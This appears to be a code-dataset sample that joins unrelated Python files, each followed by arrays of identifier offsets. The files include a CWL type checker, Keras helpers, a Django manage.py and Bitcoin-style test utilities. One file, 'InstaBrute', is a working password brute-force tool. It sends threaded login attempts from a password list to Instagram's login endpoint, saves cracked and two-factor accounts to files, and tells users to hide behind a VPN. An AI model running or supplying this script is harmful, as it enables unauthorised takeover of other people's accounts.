def client_class() -> Type[DeclarativeUser]:
return DeclarativeUser
| [
[
[
55,
66
]
],
[
[
88,
92
],
[
864,
868
],
[
1296,
1300
]
],
[
[
112,
116
],
[
660,
664
],
[
1743,
1747
]
],
[
[
118,
126
],
[
1705,
1713
]
],
[
[
128,
132
],
[
734,
738
],
[
1826,
1830
]
],
[
[
141,
145
],
[
572,
576
],
[
1604,
1608
]
],
[
[
207,
222
],
[
1831,
1846
],
[
1864,
1879
]
],
[
[
284,
300
],
[
739,
755
],
[
773,
789
]
],
[
[
339,
343
],
[
642,
646
],
[
1673,
1677
]
],
[
[
388,
414
],
[
1748,
1774
]
],
[
[
446,
462
],
[
1448,
1464
]
],
[
[
464,
485
],
[
1042,
1063
]
],
[
[
487,
507
],
[
1561,
1581
]
],
[
[
509,
525
],
[
953,
969
],
[
1366,
1382
]
],
[
[
536,
553
],
[
1009,
1026
],
[
1422,
1439
]
],
[
[
618,
641
],
[
873,
896
]
],
[
[
1650,
1672
],
[
1148,
1170
]
]
] |
import logging
from collections import namedtuple
from typing import (Any, Callable, Dict, # pylint: disable=unused-import
Generator, Iterable, List, Optional, Text, Union, cast)
import schema_salad.validate as validate
from schema_salad.sourceline import SourceLine, bullets, strip_dup_lineno
import six
from .errors import WorkflowException
from .loghandler import _logger
from .process import shortname
from .utils import json_dumps
def _get_type(tp):
# type: (Any) -> Any
if isinstance(tp, dict):
if tp.get("type") not in ("array", "record", "enum"):
return tp["type"]
return tp
def check_types(srctype, sinktype, linkMerge, valueFrom):
# type: (Any, Any, Optional[Text], Optional[Text]) -> Text
"""Check if the source and sink types are "pass", "warning", or "exception".
"""
if valueFrom:
return "pass"
elif not linkMerge:
if can_assign_src_to_sink(srctype, sinktype, strict=True):
return "pass"
elif can_assign_src_to_sink(srctype, sinktype, strict=False):
return "warning"
else:
return "exception"
elif linkMerge == "merge_nested":
return check_types({"items": _get_type(srctype), "type": "array"}, _get_type(sinktype), None, None)
elif linkMerge == "merge_flattened":
return check_types(merge_flatten_type(_get_type(srctype)), _get_type(sinktype), None, None)
else:
raise WorkflowException(u"Unrecognized linkMerge enu_m '%s'" % linkMerge)
def merge_flatten_type(src):
# type: (Any) -> Any
"""Return the merge flattened type of the source type
"""
if isinstance(src, list):
return [merge_flatten_type(t) for t in src]
elif isinstance(src, dict) and src.get("type") == "array":
return src
else:
return {"items": src, "type": "array"}
def can_assign_src_to_sink(src, sink, strict=False): # type: (Any, Any, bool) -> bool
"""Check for identical type specifications, ignoring extra keys like inputBinding.
src: admissible source types
sink: admissible sink types
In non-strict comparison, at least one source type must match one sink type.
In strict comparison, all source types must match at least one sink type.
"""
if src == "Any" or sink == "Any":
return True
if isinstance(src, dict) and isinstance(sink, dict):
if sink.get("not_connected") and strict:
return False
if src["type"] == "array" and sink["type"] == "array":
return can_assign_src_to_sink(src["items"], sink["items"], strict)
elif src["type"] == "record" and sink["type"] == "record":
return _compare_records(src, sink, strict)
elif src["type"] == "File" and sink["type"] == "File":
for sinksf in sink.get("secondaryFiles", []):
if not [1 for srcsf in src.get("secondaryFiles", []) if sinksf == srcsf]:
if strict:
return False
return True
else:
return can_assign_src_to_sink(src["type"], sink["type"], strict)
elif isinstance(src, list):
if strict:
for t in src:
if not can_assign_src_to_sink(t, sink):
return False
return True
else:
for t in src:
if can_assign_src_to_sink(t, sink):
return True
return False
elif isinstance(sink, list):
for t in sink:
if can_assign_src_to_sink(src, t):
return True
return False
else:
return src == sink
def _compare_records(src, sink, strict=False):
# type: (Dict[Text, Any], Dict[Text, Any], bool) -> bool
"""Compare two records, ensuring they have compatible fields.
This handles normalizing record names, which will be relative to workflow
step, so that they can be compared.
"""
def _rec_fields(rec): # type: (Dict[Text, Any]) -> Dict[Text, Any]
out = {}
for field in rec["fields"]:
name = shortname(field["name"])
out[name] = field["type"]
return out
srcfields = _rec_fields(src)
sinkfields = _rec_fields(sink)
for key in six.iterkeys(sinkfields):
if (not can_assign_src_to_sink(
srcfields.get(key, "null"), sinkfields.get(key, "null"), strict)
and sinkfields.get(key) is not None):
_logger.info("Record comparison failure for %s and %s\n"
"Did not match fields for %s: %s and %s" %
(src["name"], sink["name"], key, srcfields.get(key),
sinkfields.get(key)))
return False
return True
def static_checker(workflow_inputs, workflow_outputs, step_inputs, step_outputs, param_to_step):
# type: (List[Dict[Text, Any]], List[Dict[Text, Any]], List[Dict[Text, Any]], List[Dict[Text, Any]], Dict[Text, Dict[Text, Any]]) -> None
"""Check if all source and sink types of a workflow are compatible before run time.
"""
# source parameters: workflow_inputs and step_outputs
# sink parameters: step_inputs and workflow_outputs
# make a dictionary of source parameters, indexed by the "id" field
src_parms = workflow_inputs + step_outputs
src_dict = {}
for parm in src_parms:
src_dict[parm["id"]] = parm
step_inputs_val = check_all_types(src_dict, step_inputs, "source")
workflow_outputs_val = check_all_types(src_dict, workflow_outputs, "outputSource")
warnings = step_inputs_val["warning"] + workflow_outputs_val["warning"]
exceptions = step_inputs_val["exception"] + workflow_outputs_val["exception"]
warning_msgs = []
exception_msgs = []
for warning in warnings:
src = warning.src
sink = warning.sink
linkMerge = warning.linkMerge
if sink.get("secondaryFiles") and sorted(sink.get("secondaryFiles",[])) != sorted(src.get("secondaryFiles",[])):
msg1 = "Sink '%s'" % (shortname(sink["id"]))
msg2 = SourceLine(sink.get("_tool_entry", sink), "secondaryFiles").makeError(
"expects secondaryFiles: %s but" % (sink.get("secondaryFiles")))
if "secondaryFiles" in src:
msg3 = SourceLine(src, "secondaryFiles").makeError(
"source '%s' has secondaryFiles %s." % (shortname(src["id"]), src.get("secondaryFiles")))
else:
msg3 = SourceLine(src, "id").makeError(
"source '%s' does not include secondaryFiles." % (shortname(src["id"])))
msg4 = SourceLine(src, "id").makeError("To fix, add secondaryFiles: %s to definition of '%s'." % (sink.get("secondaryFiles"), shortname(src["id"])))
msg = SourceLine(sink).makeError("%s\n%s" % (msg1, bullets([msg2, msg3, msg4], " ")))
elif sink.get("not_connected"):
msg = SourceLine(sink, "type").makeError(
"'%s' is not an input parameter of %s, expected %s"
% (shortname(sink["id"]), param_to_step[sink["id"]]["run"],
", ".join(shortname(s["id"])
for s in param_to_step[sink["id"]]["inputs"]
if not s.get("not_connected"))))
else:
msg = SourceLine(src, "type").makeError(
"Source '%s' of type %s may be incompatible"
% (shortname(src["id"]), json_dumps(src["type"]))) + "\n" + \
SourceLine(sink, "type").makeError(
" with sink '%s' of type %s"
% (shortname(sink["id"]), json_dumps(sink["type"])))
if linkMerge:
msg += "\n" + SourceLine(sink).makeError(" source has linkMerge method %s" % linkMerge)
warning_msgs.append(msg)
for exception in exceptions:
src = exception.src
sink = exception.sink
linkMerge = exception.linkMerge
msg = SourceLine(src, "type").makeError(
"Source '%s' of type %s is incompatible"
% (shortname(src["id"]), json_dumps(src["type"]))) + "\n" + \
SourceLine(sink, "type").makeError(
" with sink '%s' of type %s"
% (shortname(sink["id"]), json_dumps(sink["type"])))
if linkMerge:
msg += "\n" + SourceLine(sink).makeError(" source has linkMerge method %s" % linkMerge)
exception_msgs.append(msg)
for sink in step_inputs:
if ('null' != sink["type"] and 'null' not in sink["type"]
and "source" not in sink and "default" not in sink and "valueFrom" not in sink):
msg = SourceLine(sink).makeError(
"Required parameter '%s' does not have source, default, or valueFrom expression"
% shortname(sink["id"]))
exception_msgs.append(msg)
all_warning_msg = strip_dup_lineno("\n".join(warning_msgs))
all_exception_msg = strip_dup_lineno("\n".join(exception_msgs))
if warnings:
_logger.warning("Workflow checker warning:\n%s" % all_warning_msg)
if exceptions:
raise validate.ValidationException(all_exception_msg)
SrcSink = namedtuple("SrcSink", ["src", "sink", "linkMerge"])
def check_all_types(src_dict, sinks, sourceField):
# type: (Dict[Text, Any], List[Dict[Text, Any]], Text) -> Dict[Text, List[SrcSink]]
    # sourceField is either "source" or "outputSource"
"""Given a list of sinks, check if their types match with the types of their sources.
"""
validation = {"warning": [], "exception": []} # type: Dict[Text, List[SrcSink]]
for sink in sinks:
if sourceField in sink:
valueFrom = sink.get("valueFrom")
if isinstance(sink[sourceField], list):
srcs_of_sink = [src_dict[parm_id] for parm_id in sink[sourceField]]
linkMerge = sink.get("linkMerge", ("merge_nested"
if len(sink[sourceField]) > 1 else None))
else:
parm_id = sink[sourceField]
srcs_of_sink = [src_dict[parm_id]]
linkMerge = None
for src in srcs_of_sink:
check_result = check_types(src, sink, linkMerge, valueFrom)
if check_result == "warning":
validation["warning"].append(SrcSink(src, sink, linkMerge))
elif check_result == "exception":
validation["exception"].append(SrcSink(src, sink, linkMerge))
return validation
| [
[
[
7,
14
]
],
[
[
39,
49
],
[
9236,
9246
]
],
[
[
70,
73
]
],
[
[
75,
83
]
],
[
[
85,
89
]
],
[
[
144,
153
]
],
[
[
155,
163
]
],
[
[
165,
169
]
],
[
[
171,
179
]
],
[
[
181,
185
]
],
[
[
187,
192
]
],
[
[
194,
198
]
],
[
[
208,
241
],
[
9176,
9184
]
],
[
[
278,
288
],
[
6112,
6122
],
[
6327,
6337
],
[
6523,
6533
],
[
6668,
6678
],
[
6828,
6838
],
[
6967,
6977
],
[
7363,
7373
],
[
7553,
7563
],
[
7768,
7778
],
[
8022,
8032
],
[
8196,
8206
],
[
8395,
8405
],
[
8712,
8722
]
],
[
[
290,
297
],
[
6873,
6880
]
],
[
[
299,
315
],
[
8940,
8956
],
[
9006,
9022
]
],
[
[
323,
326
],
[
4276,
4279
]
],
[
[
348,
365
],
[
1464,
1481
]
],
[
[
390,
397
],
[
4485,
4492
],
[
9076,
9083
]
],
[
[
419,
428
],
[
6070,
6079
],
[
6432,
6441
],
[
6626,
6635
],
[
6787,
6796
],
[
7090,
7099
],
[
7176,
7185
],
[
7478,
7487
],
[
7662,
7671
],
[
8125,
8134
],
[
8297,
8306
],
[
8855,
8864
],
[
4110,
4119
]
],
[
[
448,
458
],
[
7500,
7510
],
[
7685,
7695
],
[
8147,
8157
],
[
8320,
8330
]
],
[
[
465,
474
],
[
1228,
1237
],
[
1266,
1275
],
[
1386,
1395
],
[
1407,
1416
]
],
[
[
645,
656
],
[
1206,
1217
],
[
1355,
1366
],
[
10276,
10287
]
],
[
[
1538,
1556
],
[
1367,
1385
],
[
1701,
1719
]
],
[
[
1882,
1904
],
[
927,
949
],
[
1022,
1044
],
[
2558,
2580
],
[
3076,
3098
],
[
3234,
3256
],
[
3383,
3405
],
[
3544,
3566
],
[
4318,
4340
]
],
[
[
3668,
3684
],
[
2704,
2720
]
],
[
[
4782,
4796
]
],
[
[
9226,
9233
],
[
10416,
10423
],
[
10548,
10555
]
],
[
[
9293,
9308
],
[
5452,
5467
],
[
5528,
5543
]
]
] |
from isserviceup.services.models.statuspage import StatusPagePlugin
class Loggly(StatusPagePlugin):
name = 'Loggly'
status_url = 'http://status.loggly.com//'
icon_url = '/images/icons/loggly.jpg'
| [
[
[
51,
67
],
[
83,
99
]
],
[
[
76,
82
]
]
] |
import tensorflow as tf
from contextlib import contextmanager
from PIL import Image
from keras import backend as K
from keras.utils.data_utils import OrderedEnqueuer
def heteroscedastic_loss(attention=False,
block_attention_gradient=False,
mode='l2'):
''' Heteroscedastic loss.'''
def het_loss(y_true, y_pred):
y_mean = y_pred[:,:,:,:3]
y_logvar = y_pred[:,:,:,3:]
y_logvar = K.clip(y_logvar, -10, 10)
if mode == 'l2':
euclidian_loss = K.square(y_true/127.5 - y_mean/127.5)
elif mode == 'l1':
euclidian_loss = K.abs(y_true/127.5 - y_mean/127.5)
loss = tf.exp(-y_logvar)*euclidian_loss + y_logvar
loss *= 127.5
if mode == 'l2':
loss *= 127.5
if attention:
attention_mask = K.sigmoid(y_logvar)
if block_attention_gradient:
attention_mask = K.stop_gradient(attention_mask)
loss = attention_mask * loss
return K.mean(loss, axis=-1)
return het_loss
@contextmanager
def concurrent_generator(sequence, num_workers=8, max_queue_size=32, use_multiprocessing=False):
enqueuer = OrderedEnqueuer(sequence, use_multiprocessing=use_multiprocessing)
try:
enqueuer.start(workers=num_workers, max_queue_size=max_queue_size)
yield enqueuer.get()
finally:
enqueuer.stop()
def init_session(gpu_memory_fraction):
K.tensorflow_backend.set_session(tensorflow_session(gpu_memory_fraction=gpu_memory_fraction))
def reset_session(gpu_memory_fraction):
K.clear_session()
init_session(gpu_memory_fraction)
def tensorflow_session(gpu_memory_fraction):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = gpu_memory_fraction
return tf.Session(config=config)
def load_image(path):
img = Image.open(path)
if img.mode != 'RGB':
img = img.convert('RGB')
return img
| [
[
[
7,
23
],
[
1546,
1548
],
[
1685,
1687
],
[
605,
607
]
],
[
[
48,
62
],
[
940,
954
]
],
[
[
79,
84
],
[
1742,
1747
]
],
[
[
104,
116
],
[
1299,
1300
],
[
1436,
1437
],
[
416,
417
],
[
481,
482
],
[
560,
561
],
[
742,
743
],
[
817,
818
],
[
891,
892
]
],
[
[
152,
167
],
[
1064,
1079
]
],
[
[
173,
193
]
],
[
[
959,
979
]
],
[
[
1263,
1275
],
[
1455,
1467
]
],
[
[
1399,
1412
]
],
[
[
1495,
1513
],
[
1332,
1350
]
],
[
[
1717,
1727
]
]
] |
from __future__ import absolute_import
from __future__ import print_function
import requests, sys, threading, time, os, random
from random import randint
from six.moves import input
CheckVersion = str (sys.version)
import re
from datetime import datetime
print ('''
....
%
^
L
"F3 $r
$$$$.e$" .
"$$$$$" "
(insTof by 5) $$$$c /
. $$$$$$$P
."c $$$
.$c3b ..J$$$$$e
4$$$$ .$$$$$$$$$$$$$$c
$$$$b .$$$$$$$$$$$$$$$$r
$$$. .$$$$$$$$$$$$$$$$$$
$$$c .$$$$$$$ "$$$$$$$$$r
Author : Falah
snapchat : flaah999
  Operation requires VPN software. Please enable it before running the tool
""""""""""""""""""""""""""""""""""""""""""
''')
class InstaBrute (object):
def __init__(self):
try:
user = input ('username : ')
Combo = input ('passList : ')
print ('\n----------------------------')
except:
print (' The tool was arrested exit ')
sys.exit ()
with open (Combo, 'r') as x:
Combolist = x.read ().splitlines ()
thread = []
self.Coutprox = 0
for combo in Combolist:
password = combo.split (':')[0]
t = threading.Thread (target=self.New_Br, args=(user, password))
t.start ()
thread.append (t)
time.sleep (0.9)
for j in thread:
j.join ()
def cls(self):
linux = 'clear'
windows = 'cls'
os.system ([linux, windows][os.name == 'nt'])
def New_Br(self, user, pwd):
link = 'https://www.instagram.com/accounts/login/'
login_url = 'https://www.instagram.com/accounts/login/ajax/'
time = int (datetime.now ().timestamp ())
payload = {
'username': user,
'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{time}:{pwd}',
'queryParams': {},
'optIntoOneTap': 'false'
}
with requests.Session () as s:
r = s.get (link)
r = s.post (login_url, data=payload, headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://www.instagram.com/accounts/login/",
"x-csrftoken": 'ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo'
})
print (f'{user}:{pwd}\n----------------------------')
if 'checkpoint_url' in r.text:
print (('' + user + ':' + pwd + ' --> Good hack '))
with open ('good.txt', 'a') as x:
x.write (user + ':' + pwd + '\n')
elif 'two_factor_required' in r.text:
print (('' + user + ':' + pwd + ' --> Good It has to be checked '))
with open ('results_NeedVerfiy.txt', 'a') as x:
x.write (user + ':' + pwd + '\n')
InstaBrute()
| [
[
[
23,
38
]
],
[
[
62,
76
]
],
[
[
84,
92
],
[
2852,
2860
]
],
[
[
94,
97
],
[
203,
206
],
[
1878,
1881
]
],
[
[
99,
108
],
[
2114,
2123
]
],
[
[
110,
114
],
[
2240,
2244
]
],
[
[
116,
118
],
[
2380,
2382
],
[
2408,
2410
]
],
[
[
120,
126
]
],
[
[
146,
153
]
],
[
[
176,
181
],
[
1681,
1686
],
[
1723,
1728
]
],
[
[
183,
195
]
],
[
[
223,
225
]
],
[
[
247,
255
],
[
2609,
2617
]
],
[
[
1603,
1613
],
[
3859,
3869
]
]
] |
#!/usr/bin/env python
#from gevent import monkey
#monkey.patch_all(aggressive=True)
#from psycogreen.gevent import patch_psycopg
#patch_psycopg()
#import eventlet
#eventlet.monkey_patch()
#from psycogreen.eventlet import patch_psycopg
#patch_psycopg()
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "internetnl.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
[
[
262,
264
],
[
308,
310
]
],
[
[
272,
275
],
[
1031,
1034
]
],
[
[
431,
456
],
[
1005,
1030
]
],
[
[
694,
700
]
]
] |
class AutoVivification(dict):
"""Implementation of perl's autovivification."""
def __missing__(self, key):
value = self[key] = type(self)()
return value
weather = AutoVivification()
weather['china']['guangdong']['shenzhen'] = 'sunny'
weather['china']['hubei']['wuhan'] = 'sunny'
weather['USA']['California']['Los Angeles'] = 'sunny'
print(weather)
| [
[
[
6,
22
],
[
189,
205
]
],
[
[
179,
186
],
[
208,
215
],
[
260,
267
],
[
305,
312
],
[
365,
372
]
]
] |
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Helpful routines for regression testing."""
from base64 import b64encode
from binascii import hexlify, unhexlify
from decimal import Decimal, ROUND_DOWN
import hashlib
import inspect
import json
import logging
import os
import random
import re
from subprocess import CalledProcessError
import time
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
logger = logging.getLogger("TestFramework.utils")
# Assert functions
##################
def assert_fee_amount(fee, tx_size, fee_per_kB):
"""Assert the fee was in range"""
target_fee = round(tx_size * fee_per_kB / 1000, 8)
if fee < target_fee:
raise AssertionError("Fee of %s CPT too low! (Should be %s CPT)" % (str(fee), str(target_fee)))
# allow the wallet's estimation to be at most 2 bytes off
if fee > (tx_size + 2) * fee_per_kB / 1000:
raise AssertionError("Fee of %s CPT too high! (Should be %s CPT)" % (str(fee), str(target_fee)))
def assert_equal(thing1, thing2, *args):
if thing1 != thing2 or any(thing1 != arg for arg in args):
raise AssertionError("not(%s)" % " == ".join(str(arg) for arg in (thing1, thing2) + args))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s" % (str(thing1), str(thing2)))
def assert_greater_than_or_equal(thing1, thing2):
if thing1 < thing2:
raise AssertionError("%s < %s" % (str(thing1), str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
assert_raises_message(exc, None, fun, *args, **kwds)
def assert_raises_message(exc, message, fun, *args, **kwds):
try:
fun(*args, **kwds)
except JSONRPCException:
raise AssertionError("Use assert_raises_rpc_error() to test RPC failures")
except exc as e:
if message is not None and message not in e.error['message']:
raise AssertionError("Expected substring not found:" + e.error['message'])
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_raises_process_error(returncode, output, fun, *args, **kwds):
"""Execute a process and asserts the process return code and output.
Calls function `fun` with arguments `args` and `kwds`. Catches a CalledProcessError
and verifies that the return code and output are as expected. Throws AssertionError if
no CalledProcessError was raised or if the return code and output are not as expected.
Args:
returncode (int): the process return code.
output (string): [a substring of] the process output.
fun (function): the function to call. This should execute a process.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
try:
fun(*args, **kwds)
except CalledProcessError as e:
if returncode != e.returncode:
raise AssertionError("Unexpected returncode %i" % e.returncode)
if output not in e.output:
raise AssertionError("Expected substring not found:" + e.output)
else:
raise AssertionError("No exception raised")
def assert_raises_rpc_error(code, message, fun, *args, **kwds):
"""Run an RPC and verify that a specific JSONRPC exception code and message is raised.
Calls function `fun` with arguments `args` and `kwds`. Catches a JSONRPCException
and verifies that the error code and message are as expected. Throws AssertionError if
no JSONRPCException was raised or if the error code/message are not as expected.
Args:
code (int), optional: the error code returned by the RPC call (defined
in src/rpc/protocol.h). Set to None if checking the error code is not required.
message (string), optional: [a substring of] the error string returned by the
RPC call. Set to None if checking the error string is not required.
fun (function): the function to call. This should be the name of an RPC.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
assert try_rpc(code, message, fun, *args, **kwds), "No exception raised"
def try_rpc(code, message, fun, *args, **kwds):
"""Tries to run an rpc command.
Test against error code and message if the rpc fails.
Returns whether a JSONRPCException was raised."""
try:
fun(*args, **kwds)
except JSONRPCException as e:
# JSONRPCException was thrown as expected. Check the code and message values are correct.
if (code is not None) and (code != e.error["code"]):
raise AssertionError("Unexpected JSONRPC error code %i" % e.error["code"])
if (message is not None) and (message not in e.error['message']):
raise AssertionError("Expected substring not found:" + e.error['message'])
return True
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
return False
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, str):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find=False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find:
assert_equal(expected, {})
num_matched = 0
for item in object_array:
all_match = True
for key, value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find:
num_matched = num_matched + 1
for key, value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s" % (str(item), str(key), str(value)))
num_matched = num_matched + 1
if num_matched == 0 and not should_not_find:
raise AssertionError("No objects matched %s" % (str(to_match)))
if num_matched > 0 and should_not_find:
raise AssertionError("Objects were found %s" % (str(to_match)))
# Utility functions
###################
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n))) * 1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def bytes_to_hex_str(byte_str):
return hexlify(byte_str).decode('ascii')
def hash256(byte_str):
sha256 = hashlib.sha256()
sha256.update(byte_str)
sha256d = hashlib.sha256()
sha256d.update(sha256.digest())
return sha256d.digest()[::-1]
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
def wait_until(predicate, *, attempts=float('inf'), timeout=float('inf'), lock=None):
if attempts == float('inf') and timeout == float('inf'):
timeout = 60
attempt = 0
time_end = time.time() + timeout
while attempt < attempts and time.time() < time_end:
if lock:
with lock:
if predicate():
return
else:
if predicate():
return
attempt += 1
time.sleep(0.05)
# Print the cause of the timeout
predicate_source = "''''\n" + inspect.getsource(predicate) + "'''"
logger.error("wait_until() failed. Predicate: {}".format(predicate_source))
if attempt >= attempts:
raise AssertionError("Predicate {} not true after {} attempts".format(predicate_source, attempts))
elif time.time() >= time_end:
raise AssertionError("Predicate {} not true after {} seconds".format(predicate_source, timeout))
raise RuntimeError('Unreachable')
# RPC/P2P connection constants and functions
############################################
# The maximum number of nodes a single test can spawn
MAX_NODES = 8
# Don't assign rpc or p2p ports lower than this
PORT_MIN = 11000
# The number of ports to "reserve" for p2p and rpc, each
PORT_RANGE = 5000
class PortSeed:
# Must be initialized with a unique integer for each process
n = None
def get_rpc_proxy(url, node_number, timeout=None, coveragedir=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url # store URL on proxy for info
coverage_logfile = coverage.get_filename(
coveragedir, node_number) if coveragedir else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def p2p_port(n):
assert(n <= MAX_NODES)
return PORT_MIN + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_port(n):
return PORT_MIN + PORT_RANGE + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_url(datadir, i, rpchost=None):
rpc_u, rpc_p = get_auth_cookie(datadir)
host = '127.0.0.1'
port = rpc_port(i)
if rpchost:
parts = rpchost.split(':')
if len(parts) == 2:
host, port = parts
else:
host = rpchost
return "http://%s:%s@%s:%d" % (rpc_u, rpc_p, host, int(port))
# Node functions
################
def initialize_datadir(dirname, n):
datadir = get_datadir_path(dirname, n)
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "generalcoin.conf"), 'w', encoding='utf8') as f:
f.write("regtest=1\n")
f.write("[regtest]\n")
f.write("port=" + str(p2p_port(n)) + "\n")
f.write("rpcport=" + str(rpc_port(n)) + "\n")
f.write("server=1\n")
f.write("keypool=1\n")
f.write("discover=0\n")
f.write("listenonion=0\n")
f.write("printtoconsole=0\n")
os.makedirs(os.path.join(datadir, 'stderr'), exist_ok=True)
os.makedirs(os.path.join(datadir, 'stdout'), exist_ok=True)
return datadir
def get_datadir_path(dirname, n):
return os.path.join(dirname, "node" + str(n))
def append_config(datadir, options):
with open(os.path.join(datadir, "generalcoin.conf"), 'a', encoding='utf8') as f:
for option in options:
f.write(option + "\n")
def get_auth_cookie(datadir):
user = None
password = None
if os.path.isfile(os.path.join(datadir, "generalcoin.conf")):
with open(os.path.join(datadir, "generalcoin.conf"), 'r', encoding='utf8') as f:
for line in f:
if line.startswith("rpcuser="):
assert user is None # Ensure that there is only one rpcuser line
user = line.split("=")[1].strip("\n")
if line.startswith("rpcpassword="):
assert password is None # Ensure that there is only one rpcpassword line
password = line.split("=")[1].strip("\n")
if os.path.isfile(os.path.join(datadir, "regtest", ".cookie")) and os.access(os.path.join(datadir, "regtest", ".cookie"), os.R_OK):
with open(os.path.join(datadir, "regtest", ".cookie"), 'r', encoding="ascii") as f:
userpass = f.read()
split_userpass = userpass.split(':')
user = split_userpass[0]
password = split_userpass[1]
if user is None or password is None:
raise ValueError("No RPC credentials")
return user, password
# If a cookie file exists in the given datadir, delete it.
def delete_cookie_file(datadir):
if os.path.isfile(os.path.join(datadir, "regtest", ".cookie")):
logger.debug("Deleting leftover cookie file")
os.remove(os.path.join(datadir, "regtest", ".cookie"))
def get_bip9_status(node, key):
info = node.getblockchaininfo()
return info['bip9_softforks'][key]
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def disconnect_nodes(from_connection, node_num):
for peer_id in [peer['id'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']]:
try:
from_connection.disconnectnode(nodeid=peer_id)
except JSONRPCException as e:
# If this node is disconnected between calculating the peer id
# and issuing the disconnect, don't worry about it.
# This avoids a race condition if we're mass-disconnecting peers.
if e.error['code'] != -29: # RPC_CLIENT_NODE_NOT_CONNECTED
raise
# wait to disconnect
wait_until(lambda: [peer['id'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']] == [], timeout=5)
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:" + str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
wait_until(lambda: all(peer['version'] != 0 for peer in from_connection.getpeerinfo()))
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def sync_blocks(rpc_connections, *, wait=1, timeout=60):
"""
Wait until everybody has the same tip.
sync_blocks needs to be called with an rpc_connections set that has least
one node already synced to the latest, stable tip, otherwise there's a
chance it might return before all nodes are stably synced.
"""
stop_time = time.time() + timeout
while time.time() <= stop_time:
best_hash = [x.getbestblockhash() for x in rpc_connections]
if best_hash.count(best_hash[0]) == len(rpc_connections):
return
time.sleep(wait)
raise AssertionError("Block sync timed out:{}".format("".join("\n {!r}".format(b) for b in best_hash)))
def sync_mempools(rpc_connections, *, wait=1, timeout=60, flush_scheduler=True):
"""
Wait until everybody has the same transactions in their memory
pools
"""
stop_time = time.time() + timeout
while time.time() <= stop_time:
pool = [set(r.getrawmempool()) for r in rpc_connections]
if pool.count(pool[0]) == len(rpc_connections):
if flush_scheduler:
for r in rpc_connections:
r.syncwithvalidationinterfacequeue()
return
time.sleep(wait)
raise AssertionError("Mempool sync timed out:{}".format("".join("\n {!r}".format(m) for m in pool)))
# Transaction/Block functions
#############################
def find_output(node, txid, amount, *, blockhash=None):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1, blockhash)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found" % (txid, str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >= 0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
